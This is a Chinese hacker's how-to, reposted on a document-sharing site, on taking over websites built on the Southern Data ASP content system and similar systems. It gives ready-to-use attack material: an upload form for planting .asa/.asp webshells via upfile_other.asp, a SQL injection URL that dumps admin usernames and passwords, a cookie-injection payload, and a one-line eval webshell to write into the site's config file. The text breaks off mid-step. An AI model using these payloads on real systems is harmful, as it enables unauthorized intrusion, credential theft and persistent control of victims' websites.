南方数据拿shell总结.doc

  1. 1、本文档共6页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
南方数据拿shell总结

南方数据拿shell总结 南方数据拿shell总结2010-09-16 21:56转载自 arthacker最终编辑 arthacker本文来源于:逍遥复仇 、通过upfile_other.asp漏洞文件直接取SHELL 直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下: HTMLHEAD META http-equiv=Content-Type content=text/html; charset=gb2312 STYLE type=text/cssBODY { FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee } .tx1 { BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px } /STYLE META content=MSHTML 6.00.2800.1400 name=GENERATOR/HEAD BODY leftMargin=0 topMargin=0 FORM name=form1 action=/upfile_Other.asp; method=post encType=multipart/form-dataINPUT class=tx1 type=file size=30 name=FileName INPUT class=tx1 type=file size=30 name=FileName1 INPUT style=BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal type=submit value=上传 name=Submit INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID /FORM/BODY/HTML 将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。 注:此方法通杀南方数据、良精系统、网软天下等 2、通过注入秒杀管理员帐号密码,使用如下: /NewsType.asp?SmallClass=%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20= 以上代码直接暴管理员帐号和密码,取SHELL方法如下: 在网站配置[/admin/SiteConfig.asp]的版权信息里写入 %%eval(request(chr(35)))%% 成功把shell写入/inc/config.asp 这里一句话chr(32)密码是“#” 3、cookie注入 清空地址栏,利用union语句来注入,提交: javascript:alert(document.cookie=id=+escape(1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin)) 如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为? 注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。 (当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助) 三、后台取SHELL方法总结 (1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入%%Eval(Request(chr(

文档评论(0)

sy78219 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档